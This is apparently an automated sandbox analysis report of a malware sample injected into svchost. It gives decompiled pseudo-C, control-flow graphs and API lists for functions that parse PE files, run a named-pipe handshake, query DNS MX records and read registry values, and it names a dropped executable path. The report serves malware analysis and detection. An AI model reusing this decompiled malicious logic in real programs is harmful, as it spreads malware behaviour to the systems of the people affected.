                                                                                control_flow_graph 1121 12675c-126778 1122 126784-1267a2 CreateFileA 1121->1122 1123 12677a-12677e SetFileAttributesA 1121->1123 1124 1267a4-1267b2 CreateFileA 1122->1124 1125 1267b5-1267b8 1122->1125 1123->1122 1124->1125 1126 1267c5-1267c9 1125->1126 1127 1267ba-1267bf SetFileAttributesA 1125->1127 1128 126977-126986 1126->1128 1129 1267cf-1267df GetFileSize 1126->1129 1127->1126 1130 1267e5-1267e7 1129->1130 1131 12696b 1129->1131 1130->1131 1133 1267ed-12680b ReadFile 1130->1133 1132 12696e-126971 FindCloseChangeNotification 1131->1132 1132->1128 1133->1131 1134 126811-126824 SetFilePointer 1133->1134 1134->1131 1135 12682a-126842 ReadFile 1134->1135 1135->1131 1136 126848-126861 SetFilePointer 1135->1136 1136->1131 1137 126867-126876 1136->1137 1138 1268d5-1268df 1137->1138 1139 126878-12688f ReadFile 1137->1139 1138->1132 1140 1268e5-1268eb 1138->1140 1141 1268d2 1139->1141 1142 126891-12689e 1139->1142 1143 1268f0-1268fe call 12ebcc 1140->1143 1144 1268ed 1140->1144 1141->1138 1145 1268a0-1268b5 1142->1145 1146 1268b7-1268ba 1142->1146 1143->1131 1153 126900-12690b SetFilePointer 1143->1153 1144->1143 1147 1268bd-1268c3 1145->1147 1146->1147 1149 1268c5 1147->1149 1150 1268c8-1268ce 1147->1150 1149->1150 1150->1139 1152 1268d0 1150->1152 1152->1138 1154 12695a-126969 call 12ec2e 1153->1154 1155 12690d-126920 ReadFile 1153->1155 1154->1132 1155->1154 1156 126922-126958 1155->1156 1156->1132
                                                                                C-Code - Quality: 100%
                                                                                			E0012675C(CHAR* _a4, long* _a8, long _a12) {
                                                                                				long _v8;
                                                                                				void* _v12;
                                                                                				struct _OVERLAPPED* _v16;
                                                                                				long _v20;
                                                                                				struct _OVERLAPPED* _v24;
                                                                                				long _v28;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v60;
                                                                                				void _v68;
                                                                                				long _v72;
                                                                                				void _v132;
                                                                                				intOrPtr _v320;
                                                                                				signed int _v360;
                                                                                				signed int _v374;
                                                                                				void _v380;
                                                                                				void* _t85;
                                                                                				long _t88;
                                                                                				int _t92;
                                                                                				long _t93;
                                                                                				int _t96;
                                                                                				long _t99;
                                                                                				long _t102;
                                                                                				struct _OVERLAPPED* _t103;
                                                                                				long _t104;
                                                                                				long _t115;
                                                                                				long _t120;
                                                                                				signed int _t143;
                                                                                				void* _t146;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_v8 = 0;
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 0x80);
                                                                                				}
                                                                                				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                                				_v12 = _t85;
                                                                                				if(_t85 == 0xffffffff) {
                                                                                					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
                                                                                				}
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 2);
                                                                                				}
                                                                                				if(_v12 != 0xffffffff) {
                                                                                					_t88 = GetFileSize(_v12, 0);
                                                                                					_v8 = _t88;
                                                                                					if(_t88 == 0xffffffff || _t88 == 0) {
                                                                                						L31:
                                                                                						_v8 = 0;
                                                                                					} else {
                                                                                						_a12 = 0;
                                                                                						_v28 = 0;
                                                                                						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
                                                                                						if(_t92 == 0) {
                                                                                							goto L31;
                                                                                						} else {
                                                                                							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
                                                                                							if(_t93 == 0xffffffff) {
                                                                                								goto L31;
                                                                                							} else {
                                                                                								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
                                                                                								if(_t96 == 0) {
                                                                                									goto L31;
                                                                                								} else {
                                                                                									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
                                                                                									if(_t99 == 0xffffffff) {
                                                                                										goto L31;
                                                                                									} else {
                                                                                										_v20 = 0;
                                                                                										_v24 = 0;
                                                                                										if(0 < _v374) {
                                                                                											while(1) {
                                                                                												_t115 = 0x28;
                                                                                												_a12 = _t115;
                                                                                												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
                                                                                													break;
                                                                                												}
                                                                                												_t143 = _v374 & 0x0000ffff;
                                                                                												if(_v24 != _t143 - 1) {
                                                                                													_t120 = _v48 + _v52;
                                                                                												} else {
                                                                                													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                                                                												}
                                                                                												_a12 = _t120;
                                                                                												if(_v20 < _t120) {
                                                                                													_v20 = _t120;
                                                                                												}
                                                                                												_v24 = _v24 + 1;
                                                                                												if(_v24 < _t143) {
                                                                                													continue;
                                                                                												} else {
                                                                                												}
                                                                                												goto L23;
                                                                                											}
                                                                                											_v8 = 0;
                                                                                										}
                                                                                										L23:
                                                                                										if(_v24 >= (_v374 & 0x0000ffff)) {
                                                                                											_t102 = _v20;
                                                                                											if(_v8 > _t102) {
                                                                                												_v8 = _t102;
                                                                                											}
                                                                                											_t103 = E0012EBCC(_v8);
                                                                                											_v16 = _t103;
                                                                                											if(_t103 == 0) {
                                                                                												goto L31;
                                                                                											} else {
                                                                                												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
                                                                                												if(_t104 == 0xffffffff) {
                                                                                													L30:
                                                                                													_v8 = 0;
                                                                                													E0012EC2E(_v16);
                                                                                													_v16 = 0;
                                                                                												} else {
                                                                                													_t146 = _v16;
                                                                                													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
                                                                                														goto L30;
                                                                                													} else {
                                                                                														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                                                                														_v8 = _v20;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					FindCloseChangeNotification(_v12); // executed
                                                                                				}
                                                                                				 *_a8 = _v8;
                                                                                				return _v16;
                                                                                			}

                                                                                0x00126920
                                                                                0x0012690b
                                                                                0x001268fe
                                                                                0x001268df
                                                                                0x00126861
                                                                                0x00126842
                                                                                0x00126824
                                                                                0x0012680b
                                                                                0x00126971
                                                                                0x00126971
                                                                                0x0012697f
                                                                                0x00126986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0012677E
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0012679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 001267B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 001267BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 001267D3
                                                                                • ReadFile.KERNEL32(000000FF,?,00000040,00128244,00000000,?,74CB43E0,00000000), ref: 00126807
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012681F
                                                                                • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0012683E
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00128244,00000000,?,74CB43E0,00000000), ref: 0012688B
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00126906
                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,00128244,00000000,?,74CB43E0,00000000), ref: 0012691C
                                                                                • FindCloseChangeNotification.KERNEL32(000000FF,?,74CB43E0,00000000), ref: 00126971
                                                                                  • Part of subcall function 0012EC2E: GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
                                                                                  • Part of subcall function 0012EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                • String ID:
                                                                                • API String ID: 1400801100-0
                                                                                • Opcode ID: 41d5442c1e6f6c29ab588d3b10062f61c8c308ee4268725cbb5e3175b6d35d4c
                                                                                • Instruction ID: 6edd5c3f4f12c9baf379f89ad21dcd4dc1a07361f92bf535e3b4a27ca85077f3
                                                                                • Opcode Fuzzy Hash: 41d5442c1e6f6c29ab588d3b10062f61c8c308ee4268725cbb5e3175b6d35d4c
                                                                                • Instruction Fuzzy Hash: 32711AB1D0022DEFDF159FA4DC809EEBBB9FB04354F10456AE515A6190E7309EA2DB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                • htons.WS2_32(0012CA1D), ref: 0012F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0012F367
                                                                                • closesocket.WS2_32(00000000), ref: 0012F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 8562494fdf592769789cd437eed5c55b067e2936638353dd8dd3fd9b33ba6189
                                                                                • Instruction ID: e373c6d1fa51fb84b097626a3233eb9e6ab6072eeb234409b8c96e3da68f302d
                                                                                • Opcode Fuzzy Hash: 8562494fdf592769789cd437eed5c55b067e2936638353dd8dd3fd9b33ba6189
                                                                                • Instruction Fuzzy Hash: 1C316D76900128ABDB11DFA5EC859EF7BFCFF48314F10417AF915E2150E7709A928BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                C-Code - Quality: 98%
                                                                                			E0012405E(void* __ecx) {
                                                                                				unsigned int _v8;
                                                                                				unsigned int _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v40;
                                                                                				void* _t40;
                                                                                				void* _t43;
                                                                                				void* _t46;
                                                                                				int _t47;
                                                                                				void* _t49;
                                                                                				void* _t56;
                                                                                				void* _t62;
                                                                                				void* _t64;
                                                                                				long _t71;
                                                                                				void* _t82;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t95;
                                                                                				void* _t97;
                                                                                				void* _t98;
                                                                                				void* _t99;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                
                                                                                				_t95 = __ecx;
                                                                                				_v8 = 0;
                                                                                				_t40 = CreateEventA(0, 1, 1, 0);
                                                                                				_v16 = _t40;
                                                                                				if(_t40 != 0) {
                                                                                					_t43 = E00124000(E00123ECD(_t95),  &_v20);
                                                                                					_t97 = _t98;
                                                                                					_t102 = 0x7d0;
                                                                                					_t92 = 0x100;
                                                                                					_t99 = 0x1322f8;
                                                                                					if(_t43 == 0) {
                                                                                						L10:
                                                                                						E0012EE2A(_t97, _t99, 0, _t92);
                                                                                						_t104 = _t103 + 0xc;
                                                                                						_t93 = 0xa;
                                                                                						while(1) {
                                                                                							_t93 = _t93 - 1;
                                                                                							_t46 = CreateNamedPipeA(E00123ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0); // executed
                                                                                							_t99 = _t46;
                                                                                							if(_t99 != 0xffffffff) {
                                                                                								goto L14;
                                                                                							}
                                                                                							Sleep(0x1f4);
                                                                                							if(_t93 != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							CloseHandle(_v16);
                                                                                							return 0;
                                                                                						}
                                                                                						while(1) {
                                                                                							L14:
                                                                                							_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                							if(_t47 != 0) {
                                                                                								goto L16;
                                                                                							}
                                                                                							L15:
                                                                                							_t71 = GetLastError();
                                                                                							asm("sbb eax, eax");
                                                                                							if( ~(_t71 - 0x217) + 1 == 0) {
                                                                                								L25:
                                                                                								DisconnectNamedPipe(_t99);
                                                                                								continue;
                                                                                								do {
                                                                                									while(1) {
                                                                                										L14:
                                                                                										_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                										if(_t47 != 0) {
                                                                                											goto L16;
                                                                                										}
                                                                                										goto L15;
                                                                                									}
                                                                                									L22:
                                                                                								} while (_v28 != 1);
                                                                                								E00123F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                								_t103 = _t104 + 0x14;
                                                                                								if(_v32 == 0) {
                                                                                									_t102 = CloseHandle;
                                                                                									CloseHandle(_t99);
                                                                                									CloseHandle(_t92);
                                                                                									E0012E318();
                                                                                									L8:
                                                                                									ExitProcess(0);
                                                                                								}
                                                                                								 *0x13215a =  *0x13215a + 1;
                                                                                								do {
                                                                                									L14:
                                                                                									_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                									if(_t47 != 0) {
                                                                                										goto L16;
                                                                                									}
                                                                                									goto L15;
                                                                                								} while (_t49 == 0);
                                                                                								_t92 = _v16;
                                                                                								_v8 = (_v12 >> 2) + _v12;
                                                                                								E00123F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                								_t56 = E00123F8C(_t99,  &_v12, 4, _t92, _t102);
                                                                                								_t104 = _t104 + 0x28;
                                                                                								if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
                                                                                									goto L25;
                                                                                								} else {
                                                                                									_t62 = E00123F8C(_t99,  &_v28, 8, _t92, _t102);
                                                                                									_t104 = _t104 + 0x14;
                                                                                									if(_t62 == 0 || _v24 != 0xc) {
                                                                                										goto L25;
                                                                                									} else {
                                                                                										_t64 = E00123F8C(_t99,  &_v40, 0xc, _t92, _t102);
                                                                                										_t104 = _t104 + 0x14;
                                                                                										if(_t64 == 0) {
                                                                                											goto L25;
                                                                                										}
                                                                                										goto L22;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							L16:
                                                                                							_t49 = E00123F8C(_t99,  &_v12, 4, _v16, _t102);
                                                                                							_t104 = _t104 + 0x14;
                                                                                						}
                                                                                					}
                                                                                					E0012EE2A(_t97, 0x1322f8, 0, 0x100);
                                                                                					_t103 = _t103 + 0xc;
                                                                                					if(_v20 == 0xffffffff) {
                                                                                						goto L10;
                                                                                					}
                                                                                					_v12 = E0012ECA5();
                                                                                					E00123F18(_v20,  &_v12, 4, _v16, 0x7d0);
                                                                                					_t82 = E00123F8C(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                					_t103 = _t103 + 0x28;
                                                                                					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
                                                                                						CloseHandle(_v20);
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_v8 = _v8 + (_v8 >> 2);
                                                                                						E00123F18(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                						_t103 = _t103 + 0x14;
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}
                                                                                0x00124188
                                                                                0x00124188
                                                                                0x0012418b
                                                                                0x00124193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124193
                                                                                0x001241c5
                                                                                0x001241d0
                                                                                0x001241da
                                                                                0x001241e8
                                                                                0x001241ed
                                                                                0x001241f2
                                                                                0x00000000
                                                                                0x00124202
                                                                                0x0012420b
                                                                                0x00124210
                                                                                0x00124215
                                                                                0x00000000
                                                                                0x0012421d
                                                                                0x00124226
                                                                                0x0012422b
                                                                                0x00124230
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124230
                                                                                0x00124215
                                                                                0x001241f2
                                                                                0x001241ab
                                                                                0x001241b6
                                                                                0x001241bb
                                                                                0x001241be
                                                                                0x00124188
                                                                                0x001240b2
                                                                                0x001240b7
                                                                                0x001240be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001240c9
                                                                                0x001240d5
                                                                                0x001240e7
                                                                                0x001240ec
                                                                                0x001240f1
                                                                                0x0012412a
                                                                                0x00000000
                                                                                0x00124101
                                                                                0x0012410b
                                                                                0x00124117
                                                                                0x0012411c
                                                                                0x00000000
                                                                                0x0012411c
                                                                                0x001240f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00124070
                                                                                • ExitProcess.KERNEL32 ref: 00124121
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID:
                                                                                • API String ID: 2404124870-0
                                                                                • Opcode ID: ce8f107f529c39fb425e07ea1e29eb136ab2c512d508ea0b5ca89ed9879828e0
                                                                                • Instruction ID: 1ab1aef9cd2c67597eaa0ceab913bf642c23d8f19e1537b79c35ee9594b8be54
                                                                                • Opcode Fuzzy Hash: ce8f107f529c39fb425e07ea1e29eb136ab2c512d508ea0b5ca89ed9879828e0
                                                                                • Instruction Fuzzy Hash: D951A4B1D00228BBEB11ABA0BD85FBF7BBCEF25754F000055F615A6080E7349E61C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1233 122d21-122d44 GetModuleHandleA 1234 122d46-122d52 LoadLibraryA 1233->1234 1235 122d5b-122d69 GetProcAddress 1233->1235 1234->1235 1236 122d54-122d56 1234->1236 1235->1236 1237 122d6b-122d7b DnsQuery_A 1235->1237 1239 122dee-122df1 1236->1239 1237->1236 1238 122d7d-122d88 1237->1238 1240 122d8a-122d8b 1238->1240 1241 122deb 1238->1241 1242 122d90-122d95 1240->1242 1241->1239 1243 122de2-122de8 1242->1243 1244 122d97-122daa GetProcessHeap HeapAlloc 1242->1244 1243->1242 1245 122dea 1243->1245 1244->1245 1246 122dac-122dd9 call 12ee2a lstrcpynA 1244->1246 1245->1241 1249 122de0 1246->1249 1250 122ddb-122dde 1246->1250 1249->1243 1250->1243
                                                                                C-Code - Quality: 73%
                                                                                			E00122D21(intOrPtr _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				void* _v16;
                                                                                				char _v28;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				_Unknown_base(*)()* _t20;
                                                                                				void* _t22;
                                                                                				long* _t30;
                                                                                				intOrPtr* _t37;
                                                                                				long _t39;
                                                                                				long _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsw");
                                                                                				asm("movsb");
                                                                                				_t19 = GetModuleHandleA( &_v28);
                                                                                				_t39 = 0;
                                                                                				if(_t19 != 0) {
                                                                                					L3:
                                                                                					_t20 = GetProcAddress(_t19, "DnsQuery_A");
                                                                                					if(_t20 == _t39) {
                                                                                						L2:
                                                                                						return 0;
                                                                                					}
                                                                                					_t35 =  &_v16;
                                                                                					_t22 =  *_t20(_a4, 0xf, _t39, _t39,  &_v16, _t39); // executed
                                                                                					if(_t22 != 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                					_t37 = _v16;
                                                                                					_v8 = _t39;
                                                                                					_v12 = _t39;
                                                                                					if(_t37 == _t39) {
                                                                                						L14:
                                                                                						return _v12;
                                                                                					}
                                                                                					do {
                                                                                						if( *((short*)(_t37 + 8)) != 0xf) {
                                                                                							goto L12;
                                                                                						}
                                                                                						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
                                                                                						if(_t40 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						E0012EE2A(_t35, _t40, 0, 0x108);
                                                                                						_t41 = _t41 + 0xc;
                                                                                						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
                                                                                						_t13 = _t40 + 8; // 0x8
                                                                                						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
                                                                                						_t30 = _v8;
                                                                                						_v8 = _t40;
                                                                                						if(_t30 != 0) {
                                                                                							 *_t30 = _t40;
                                                                                						} else {
                                                                                							_v12 = _t40;
                                                                                						}
                                                                                						L12:
                                                                                						_t37 =  *_t37;
                                                                                						_t39 = 0;
                                                                                					} while (_t37 != 0);
                                                                                					goto L14;
                                                                                				}
                                                                                				_t19 = LoadLibraryA( &_v28);
                                                                                				if(_t19 != 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00122F01,?,001220FF,00132000), ref: 00122D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00122D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00122D61
                                                                                • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 00122D77
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00122D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00122DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00122DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 233223969-3847274415
                                                                                • Opcode ID: 50b1f336d6a1541d6cac276fe586e837427e081993eb256bcdcd432648487730
                                                                                • Instruction ID: 8cc47d659ef7fd9be1f872d9886c35d6b792566bb5f71bb5122299170f4ec0dd
                                                                                • Opcode Fuzzy Hash: 50b1f336d6a1541d6cac276fe586e837427e081993eb256bcdcd432648487730
                                                                                • Instruction Fuzzy Hash: 4E216D7190062ABBCB229FA4EC44AAEBBB8FF08B50F114051F905E7510D7B0AAA587D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1251 1280c9-1280ed call 126ec3 1254 1280f9-128115 call 12704c 1251->1254 1255 1280ef call 127ee6 1251->1255 1260 128225-12822b 1254->1260 1261 12811b-128121 1254->1261 1259 1280f4 1255->1259 1259->1260 1262 12826c-128273 1260->1262 1263 12822d-128233 1260->1263 1261->1260 1264 128127-12812a 1261->1264 1263->1262 1265 128235-12823f call 12675c 1263->1265 1264->1260 1266 128130-128167 call 122544 RegOpenKeyExA 1264->1266 1269 128244-12824b 1265->1269 1272 128216-128222 call 12ee2a 1266->1272 1273 12816d-12818b RegQueryValueExA 1266->1273 1269->1262 1271 12824d-128269 call 1224c2 call 12ec2e 1269->1271 1271->1262 1272->1260 1275 1281f7-1281fe 1273->1275 1276 12818d-128191 1273->1276 1279 128200-128206 call 12ec2e 1275->1279 1280 12820d-128210 RegCloseKey 1275->1280 1276->1275 1281 128193-128196 1276->1281 1289 12820c 1279->1289 1280->1272 1281->1275 1285 128198-1281a8 call 12ebcc 1281->1285 1285->1280 1291 1281aa-1281c2 RegQueryValueExA 1285->1291 1289->1280 1291->1275 1292 1281c4-1281ca 1291->1292 1293 1281cd-1281d2 1292->1293 1293->1293 1294 1281d4-1281e5 call 12ebcc 1293->1294 1294->1280 1297 1281e7-1281f5 call 12ef00 1294->1297 1297->1289
                                                                                C-Code - Quality: 93%
                                                                                			E001280C9(int* __ecx) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				char _v52;
                                                                                				char _v312;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				char* _t35;
                                                                                				char* _t42;
                                                                                				char* _t45;
                                                                                				intOrPtr* _t49;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t57;
                                                                                				void* _t60;
                                                                                				intOrPtr _t63;
                                                                                				void* _t65;
                                                                                				void* _t68;
                                                                                				char _t70;
                                                                                				intOrPtr _t71;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                				_v8 = 0;
                                                                                				 *0x132c3c = 0;
                                                                                				 *0x132c38 = 0;
                                                                                				if(E00126EC3() != 0) {
                                                                                					_t27 = E0012704C(0x130264, 0, 0,  &_v312,  &_v52);
                                                                                					_t65 = _t65 + 0x14;
                                                                                					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_t35 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
                                                                                						_t68 = _t65 + 0x14;
                                                                                						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
                                                                                							L19:
                                                                                							E0012EE2A(_t56, 0x1322f8, 0, 0x100);
                                                                                							_t65 = _t68 + 0xc;
                                                                                							goto L20;
                                                                                						}
                                                                                						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
                                                                                							L15:
                                                                                							_t42 =  *0x132c3c; // 0x0
                                                                                							if(_t42 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							E0012EC2E(_t42);
                                                                                							 *0x132c3c = 0;
                                                                                							goto L17;
                                                                                						} else {
                                                                                							_t45 = E0012EBCC(_v8);
                                                                                							_pop(_t56);
                                                                                							 *0x132c3c = _t45;
                                                                                							if(_t45 == 0) {
                                                                                								L18:
                                                                                								RegCloseKey(_v12);
                                                                                								goto L19;
                                                                                							}
                                                                                							_t56 =  &_v8;
                                                                                							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
                                                                                								goto L15;
                                                                                							}
                                                                                							_t49 =  &_v312;
                                                                                							_t60 = _t49 + 1;
                                                                                							do {
                                                                                								_t57 =  *_t49;
                                                                                								_t49 = _t49 + 1;
                                                                                							} while (_t57 != 0);
                                                                                							_t52 = E0012EBCC(_t49 - _t60 + 1);
                                                                                							_pop(_t56);
                                                                                							 *0x132c38 = _t52;
                                                                                							if(_t52 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							E0012EF00(_t52,  &_v312);
                                                                                							L17:
                                                                                							_pop(_t56);
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					E00127EE6(_t56); // executed
                                                                                					L20:
                                                                                					_t70 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                					if(_t70 != 0) {
                                                                                						_t71 =  *0x1321a4; // 0x30800
                                                                                						if(_t71 == 0) {
                                                                                							_t31 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0); // executed
                                                                                							_t61 = _t31;
                                                                                							if(_t31 != 0) {
                                                                                								_t63 = _v20;
                                                                                								 *0x1322d4 = E001224C2(_t61, _t63, 0);
                                                                                								 *0x1321a4 = _t63;
                                                                                								E0012EC2E(_t61);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0012815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0012A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00128187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0012A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 001281BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00128210
                                                                                  • Part of subcall function 0012675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0012677E
                                                                                  • Part of subcall function 0012675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0012679A
                                                                                  • Part of subcall function 0012675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 001267B0
                                                                                  • Part of subcall function 0012675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 001267BF
                                                                                  • Part of subcall function 0012675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 001267D3
